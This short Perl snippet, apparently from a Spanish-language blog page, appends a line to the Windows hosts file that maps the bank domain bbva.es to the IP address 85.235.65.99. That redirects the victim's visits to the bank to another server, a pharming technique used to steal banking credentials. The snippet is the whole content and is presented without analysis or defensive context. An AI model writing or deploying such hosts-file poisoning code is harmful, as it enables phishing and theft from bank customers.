my $mensaje = “85.235.65.99 bbva.es”;$dir = ‘ C:\WINDOWS\system32\drivers\etc\hosts ‘;

open (HOSTS, “>>$dir”);

print HOSTS $mensaje;

Comentarios